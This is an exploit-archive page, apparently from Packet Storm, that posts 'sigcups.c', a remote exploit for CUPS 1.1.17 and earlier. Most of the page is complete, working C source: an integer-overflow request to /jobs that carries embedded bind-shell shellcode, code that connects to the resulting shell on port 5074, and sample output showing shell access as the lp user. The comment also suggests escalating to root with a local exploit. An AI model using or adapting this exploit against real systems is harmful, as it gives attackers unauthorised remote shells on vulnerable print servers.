exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

sigcups.c

sigcups.c
Posted Jan 4, 2003
Authored by Sigdom

Cups v1.1.17 and below remote exploit which spawns a shell as lp. Tested against Gentoo Linux with cups-1.1.17_pre20021025 installed.

tags | exploit, remote, shell
systems | linux, gentoo
SHA-256 | fd6664e13f9fdddcf6bf6c5f5bab39ed00c719fa6c0d965f76c0958998152656
Download | Favorite | View

sigcups.c

Change Mirror Download
/*
 *  by sigdoom [at] bigbox.mine.nu
 *
 *  CUPS remote exploit. Exploits integer overflow and gives you shell with
 *  daemons priviledges (usualy lp), after that you can try to use local
 *  CUPS exploit to get root.
 *
 *  1.1.17 and earlier versions are affected. Tested on gentoo with
 *  installed cups-1.1.17_pre20021025:
 *
 *  $ gcc -o sigcups sigcups.c && ./sigcups -t 127.0.0.1
 *  [*] connecting to 127.0.0.1 port 631
 *  [*] trying retaddr = 0x2fffbed8; *4 = 0xbffefb60
 *  [*] connected, sending exploit...
 *  [*] done... let's see if we have a shell...
 *  [*] w000t, here's a shell kiddie...
 *  uid=4(lp) gid=7(lp) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)
 *  Linux fox.chroot.lt 2.4.20 #2 Sun Dec 29 18:30:35 EET 2002 i686 Pentium III (Coppermine) GenuineIntel GNU/Linux
 *
 */
 
#include <stdio.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <getopt.h>

#define BUF_SIZE  4096

#define die(a) { perror("[!] "a); exit(-1); }

int    verbose = 0;
char    *host = "127.0.0.1";
int    port = 631;
unsigned long  retaddr = 805289688; /* exploit: *($retaddr * 4) = $address_of_shellcode */

char greet[] = "POST /jobs HTTP/1.1\nContent-type: application/x-www-form-urlencoded\nContent-length: %d\n\n";
char evilmsg[] = "-%u=";

/*
 * Bind shell hack by s0t4ipv6@shellcode.com.ar
 */
char hellcode[]=
  "\x31\xc0\x89\xc3\xb0\x02\xcd\x80\x38\xc3\x74\x05\x8d\x43\x01\xcd\x80"
  "\x31\xc0\x89\x45\x10\x40\x89\xc3\x89\x45\x0c\x40\x89\x45\x08\x8d\x4d"
  "\x08\xb0\x66\xcd\x80\x89\x45\x08\x43\x66\x89\x5d\x14\x66\xc7\x45\x16"
  "\x13\xd2\x31\xd2\x89\x55\x18\x8d\x55\x14\x89\x55\x0c\xc6\x45\x10\x10"
  "\xb0\x66\xcd\x80\x40\x89\x45\x0c\x43\x43\xb0\x66\xcd\x80\x43\x89\x45"
  "\x0c\x89\x45\x10\xb0\x66\xcd\x80\x89\xc3\x31\xc9\xb0\x3f\xcd\x80\x41"
  "\x80\xf9\x03\x75\xf6\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62"
  "\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80";

void usage(char *p) {
  printf(
    "Remote CUPS exploit for 1.1.17 and earlier versions\n"
    "by sigdoom [at] bigbox.mine.nu\n"
    "Usage: %s [-t <target>, -p <port>, -o <offset>, -r <retaddr>]\n"
    "\t-t <target> - IP of target\n"
    "\t-p <port> - port where cupsd runs\n"
    "\t-o <offset> - offset for retaddr ($retaddr + $offset)\n"
    "\t-r <retaddr> - give exact retaddr\n", p);
  exit(0);
}

int main(int argc, char *argv[]) {
  struct sockaddr_in dest;
  int  i, off, sock;
  fd_set  rset;
  char  buf[BUF_SIZE], buf2[BUF_SIZE];
  char  c;
  
  while ((c = getopt(argc, argv, "ho:p:r:t:v")) > 0 ){
    switch (c) {
    case 't':
      host = (char *)optarg;
      break;
    case 'o':
      retaddr += atol(optarg);
      break;
    case 'r':
      retaddr = atol(optarg);
      break;
    case 'p':
      port = atoi(optarg);
      break;
    case 'v':
      verbose++;
      break;
    case 'h':
      usage(argv[0]);
    case '?':
    case ':':
      exit(-1);
    }
  }

  printf("[*] connecting to %s port %d\n", host, port);
  printf("[*] trying retaddr = 0x%x; *4 = 0x%x\n", retaddr, retaddr*4);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    die("socket()");
    
  dest.sin_family = AF_INET;
  dest.sin_port = htons(port);
  dest.sin_addr.s_addr = inet_addr(host);
  bzero(&(dest.sin_zero), 8);

  if (connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) < 0)
    die("connect()");
  

  printf("[*] connected, sending exploit...\n");

  off = sprintf(buf, evilmsg, retaddr);
  for (i = 0; i < sizeof(hellcode)-1; i++)
    sprintf(buf+off+i*3, "%%%02X", (unsigned char)hellcode[i]);

  sprintf(buf2, greet, strlen(buf));
  
  if (verbose) {
    printf("%s", buf2);
    printf("%s\n", buf);
  }

  write(sock, buf2, strlen(buf2));
  write(sock, buf, strlen(buf));

  printf("[*] done... let's see if we have a shell...\n");
  close(sock);

  if ((sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
    die("socket()");

  dest.sin_family = AF_INET;
  dest.sin_port = htons(5074);
  dest.sin_addr.s_addr = inet_addr(host);
  bzero(&(dest.sin_zero), 8);

  system("sleep 2");
  if (connect(sock, (struct sockaddr*)&dest, sizeof(struct sockaddr)) < 0) {
    printf("[-] better luck next time! try different offsets maybe.\n");
    die("connect()");
  }

  printf("[*] w000t, here's a shell kiddie...\n");
  write(sock, "id;uname -a\n", 12);
  while (1) {
    FD_ZERO(&rset);
    FD_SET(sock,&rset);
    FD_SET(STDIN_FILENO,&rset);
    
    select(sock + 1, &rset, NULL, NULL, NULL);
    
    if (FD_ISSET(sock, &rset)) {
      i = read(sock, buf, BUF_SIZE - 1);
      if (i <= 0) {
        printf("[!] Connection closed.\n");
        close(sock);
        exit(0);
      }
      buf[i] = 0;
      printf("%s", buf);
    }
    if (FD_ISSET(STDIN_FILENO, &rset)) {
      i = read(STDIN_FILENO, buf, BUF_SIZE - 1);
      if (i > 0) {
        buf[i]=0;
        write(sock, buf, i);
      }
    }
  }

  return 0;
}

Login or Register to add favorites

File Archive:

April 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Apr 1st
    10 Files
  • 2
    Apr 2nd
    26 Files
  • 3
    Apr 3rd
    40 Files
  • 4
    Apr 4th
    6 Files
  • 5
    Apr 5th
    26 Files
  • 6
    Apr 6th
    0 Files
  • 7
    Apr 7th
    0 Files
  • 8
    Apr 8th
    22 Files
  • 9
    Apr 9th
    14 Files
  • 10
    Apr 10th
    10 Files
  • 11
    Apr 11th
    13 Files
  • 12
    Apr 12th
    14 Files
  • 13
    Apr 13th
    0 Files
  • 14
    Apr 14th
    0 Files
  • 15
    Apr 15th
    30 Files
  • 16
    Apr 16th
    10 Files
  • 17
    Apr 17th
    22 Files
  • 18
    Apr 18th
    45 Files
  • 19
    Apr 19th
    0 Files
  • 20
    Apr 20th
    0 Files
  • 21
    Apr 21st
    0 Files
  • 22
    Apr 22nd
    0 Files
  • 23
    Apr 23rd
    0 Files
  • 24
    Apr 24th
    0 Files
  • 25
    Apr 25th
    0 Files
  • 26
    Apr 26th
    0 Files
  • 27
    Apr 27th
    0 Files
  • 28
    Apr 28th
    0 Files
  • 29
    Apr 29th
    0 Files
  • 30
    Apr 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Site Links
News by Month
News Tags
Files by Month
File Tags
File Directory
About Us
History & Purpose
Contact Information
Terms of Service
Privacy Statement
Copyright Information
Services
Security Services
Hosting By
Rokasec
close